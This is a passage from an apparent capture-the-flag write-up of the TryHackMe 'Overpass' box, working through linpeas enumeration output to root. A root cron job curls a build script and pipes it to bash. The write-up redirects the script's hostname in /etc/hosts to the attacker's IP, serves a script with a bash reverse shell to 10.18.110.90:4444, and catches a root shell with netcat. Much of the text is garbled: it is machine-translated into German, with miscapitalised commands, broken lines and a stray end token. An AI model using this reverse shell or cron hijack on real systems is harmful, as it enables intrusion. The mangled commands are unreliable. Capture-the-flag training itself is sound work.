Z97-byobu.sh -rwxr-xr-x 1 root root 3417 Jan 15 2020 Z99-cloud-locale-test.sh -rwxr-xr-x 1 root root 873 Jan 15 2020 Z99-cloudinit-warnings.sh -rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh -rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ fstab/mtab? .... No ═╣ Can I read shadow files? .... No ═╣ Can I read shadow plists? .... No ═╣ Can I write shad ow plists? ..... No ═╣ Can I read opasswd file? .... No ═╣ Can I write in network-scripts? .... No ═╣ Can I read root folder? ..... No ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ files on it (limit 100) ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /home/james /run/lock /run/screen /run/user/1001 /run/user/1001/gnupg /run/user/1001/systemd /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory /var/crash /var/tmp ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 2020-06-27+02:15:00.2868882860 /etc/console-setup/cached_setup_keyboard.sh 2020-06-27+02:15:00.2868882860 /etc/console-setup/cached_setup_font.sh ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ Modified interesting files in the last 5mins (limit 100) /var/log/journal/da63cb942bf64540af49be48be5c7783/system.journal /var/log/journal/da63cb942bf64540af49be48be5c7783/user-1001.journal /var/log/auth.log /var/log/lastlog /var/log/wtmp /var/log/syslog /var/log/kern.log /home/james/.gnupg/trustdb.gpg /home/james/.gnupg/pubring.kbx logrotate 3.11.0 ╔═════════════╣ Files inside /home/james (limit 20) total 712 drwxr-xr-x 6 james james 4096 Jul 24 14:44 . drwxr-xr-x 4 root root 4096 Jun 27 2020 .. lrwxrwxrwx 1 james james 9 Jun 27 2020 .bash_history -> /dev/null -rw-r--r-- 1 james james 220 Jun 27 2020 .bash_logout -rw-r--r-- 1 james james 3771 Jun 27 2020 .bashrc drwx------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2020 .ssh -rwxrwxr-x 1 james james 676203 Jul 24 08:44 linpeas.sh -rw-rw-r-- 1 james james 438 Jun 27 2020 todo.txt -rw-rw-r-- 1 james james 38 Jun 27 2020 user.txt ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ /usr/src/linux-headers-4.15.0-108-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jun 19 2020 /usr/src/linux-headers-4.15.0-108-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 217484 Jun 19 2020 /usr/src/linux-headers-4.15.0-108-generic/.config.old -rw-r--r-- 1 root root 2746 Dec 5 2019 /usr/share/man/man8/vgcfgbackup.8.gz -rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz -rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz -rw-r-- r-- 1 root root 10939 Jun 27 2020 /usr/share/info/dir.old -rw-r--r-- 1 root root 35544 Dec 9 2019 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 7905 Jun 19 2020 /lib/modules/4.15.0-108-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 7857 Jun 19 2020 /lib/modules/4.15.0-108-generic/kernel/drivers/power/supply/wm831x_backup.ko ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔═══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 root root 1531 Jun 27 2020 /var/cache/apparmor/.features -rw-r--r-- 1 landscape landscape 0 Feb 3 2020 /var/lib/landscape/.cleanup.user -rw-r-- r--- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout -rw------ 1 root root 0 Feb 3 2020 /etc/.pwd.lock -rw-r--- 1 root root 1531 Jun 27 2020 /etc/apparmor.d/cache/.features -rw-r--- 1 root root 20 Jul 24 13:07 /run/cloud-init/.instance-id -rw-r--r-- 1 root root 2 Jul 24 13:07 /run/cloud-init/.ds-identify.result -rw-r--- 1 james james 220 Jun 27 2020 /home/james/.bash_logout -rw-r--r-- 1 james james 49 Jun 27 2020 /home/james/.overpass ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /bin/systemd-ask-password /bin/systemd-tty-ask-password-agent /etc/pam.d/common-password /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc /usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/local/go/src/syscall/creds_test.go /usr/share/doc/git/contrib/credential /usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential-cache--daemon.1.gz /usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-store.1.gz /usr/share/man/man1/git-credential.1.gz #)There are more creds/passwds files in the previous parent folder /usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz #)There are more creds/passwds files in the previous parent folder /usr/share/pam/common-password.md5sums /usr/share/ubuntu-advantage-tools/modules/credentials.sh /var/cache/debconf/passwords.dat /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords /var/lib/pam/password ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ 0.145); however: 2020-02-03 18:22:20 configure base-passwd:amd64 3.5.44 3.5.44 2020-02-03 18:22:20 install base-passwd:amd64<none> 3.5.44 2020-02-03 18:22:20 status half-configured base-passwd:amd64 3.5.44 2020-02-03 18:22:20 status half-installed base-passwd:amd64 3.5.44 2020-02-03 18:22:20 status installed base-passwd:amd64 3.5.44 2020-02-03 18:22:20 status unpacked base-passwd:amd64 3.5.44 2020-02-03 18:22:22 status half-configured base-passwd:amd64 3.5.44 2020-02-03 18:22:22 status half-installed base-passwd:amd64 3.5.44 2020-02-03 18:22:22 status unpacked base-passwd:amd64 3.5.44 2020-02-03 18:22:22 upgrade base-passwd:amd64 3.5.44 3.5.44 2020-02-03 18:22:25 install passwd:amd64<none> 1:4.5-1ubuntu1 2020-02-03 18:22:25 status half-installed passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:22:25 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:22:26 configure base-passwd:amd64 3.5.44<none> 2020-02-03 18:22:26 status half-configured base-passwd:amd64 3.5.44 2020-02-03 18:22:26 status installed base-passwd:amd64 3.5.44 2020-02-03 18:22:26 status unpacked base-passwd:amd64 3.5.44 2020-02-03 18:22:27 configure passwd:amd64 1:4.5-1ubuntu1<none> 2020-02-03 18:22:27 status half-configured passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:22:27 status installed passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:22:27 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:23:09 configure passwd:amd64 1:4.5-1ubuntu2<none> 2020-02-03 18:23:09 status half-configured passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:23:09 status half-configured passwd:amd64 1:4.5-1ubuntu2 2020-02-03 18:23:09 status half-installed passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:23:09 status installed passwd:amd64 1:4.5-1ubuntu2 2020-02-03 18:23:09 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-02-03 18:23:09 status unpacked passwd:amd64 1:4.5-1ubuntu2 2020-02-03 18:23:09 upgrade passwd:amd64 1:4.5-1ubuntu1 1:4.5-1ubuntu2 2020-06-27 02:15:11,712 - util.py[DEBUG]: Writing to /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords - wb: [644] 25 bytes 2020-06-27 02:15:11,713 - ssh_util.py[DEBUG]: line 123: option PasswordAuthentication added with yes 2020-06-27 02:15:11,763 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon. Binary file /var/log/journal/da63cb942bf64540af49be48be5c7783/user-1001.journal matches Jun 27 02:07:46 ubuntu-server chage[14820]: changed password expiry for sshd Jun 27 02:07:46 ubuntu-server usermod[14815]: change user 'sshd' password Jun 27 03:04:40 ubuntu-server systemd[1]: Started Dispatch Password Requests to Console Directory Watch. Preparing to unpack .../base-passwd_3.5.44_amd64.deb ... Preparing to unpack .../passwd_1%3a4.5-1ubuntu1_amd64.deb ... Selecting previously unselected package base-passwd. Selecting previously unselected package passwd. Setting up base-passwd (3.5.44) ... Setting up passwd (1:4.5-1ubuntu1) ... Shadow passwords are now on. Unpacking base-passwd (3.5.44) ... Unpacking base-passwd (3.5.44) over (3.5.44) ... Unpacking passwd (1:4.5-1ubuntu1) ... dpkg: base-passwd: dependency problems, but configuring anyway as you requested: ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r'</s> 

Shell =/bin/sh path =/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/usr/sbin:/usr/sbin:/usr/sbin:/usr/bin 17 * * * * Root cd/&& run -parts --Report/SBIN | (CD /&& Run -Parts --Report /etc/cron.daily) 47 6 * * 7 Root Test -x /usr /sbin /Anacron || (CD /&& Run -Parts --Report /etc/cron.weekly) 52 6 1 * * Root Test -x /usr /sbin /anacron || (cd/&& run-parts--Report /etc/cron.monthly) * * * * * root curl overpass.thm/downloads/src/buildscript.sh | verprügeln

James@Overpass-Prod: ~ $ cat /etc /hosts 127.0.0.1 localhost 127.0.1.1 Überführungs-Prod 127.0.0.1 Überführung.THM # Die folgenden Zeilen sind für ipv6 fähige Hosts :: 1 IP6-LocalHost IP6-LOUPBAUM: IP6-ALLNODES FF02 :: 2 IP6-ALLROUSTER

┌── (hacklab㉿hacklab)-[~/tryhackme/überpass] └─ $ mkdir downloads 1 ⨯ ┌── (hacklab㉿hacklab)-[~/tryhackme/überpass] └─ $ CD Downloads ┌── (hacklab㉿hacklab)-[~/tryhackme/putpact/uplab $ $ $ | ┌── (hacklab㉿hacklab)-[~/tryhackme/überpass/downloads] └─ $ ll insgesamt 4 drwxr-xr-x 2 hacklab hacklab 4096 26. Juli 09:25 SRC

┌── (hacklab㉿hacklab) -[~/tryhackme/überpass/downloads/src] └─ $ cat buildscript.sh #!/Bin/bash bash -i> & /dev/tcp/10.18.110.90/4444 0> & 1 1

┌── (hacklab㉿hacklab) -[~/tryhackme/überführlich] └─ $ sudo python3 -m http.server 80 serviert http auf 0.0.0.0 Port 80 (http://0.0.0.0:80/) ...

┌── (hacklab㉿hackLab) -[~] └─ $ sudo nc -lvnp 4444 [sudo] hacklab passwort: hör auf [any] 4444 ...

James@Overpass-Prod: ~ $ cat /etc /hosts 127.0.0.1 localhost 127.0.1.1 Überführungs-Prod 10.18.110.90 Überführung. IP6-ALLNODES FF02 :: 2 IP6-ALLROUSTER

┌── (hacklab㉿hacklab) -[~] └─ $ sudo nc -Lvnp 4444 [sudo] hacklab password: anhören [an jedem] 4444 ... eine Verbindung zu [10.18.110.90] aus (unbekannt) [10.10.40.78] 48192 BASH: kann die terminaler prozess -prozessgruppe (1473). Diese Shell root@overpass-prod: ~# whoami whoami root@overpass-prod: ~# 

root@overpass-prod: ~# ll ll insgesamt 56 drwx ----- 8 Root Root 4096 Jun 27 2020. 4096 Jun 27 2020 .cache/ drwx ------ 3 Root Root 4096 Jun 27 2020 .Local/ -RW ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2020 root.txt drwx ------- 2 root root 4096 Jun 27 2020 SRC/ root@overPas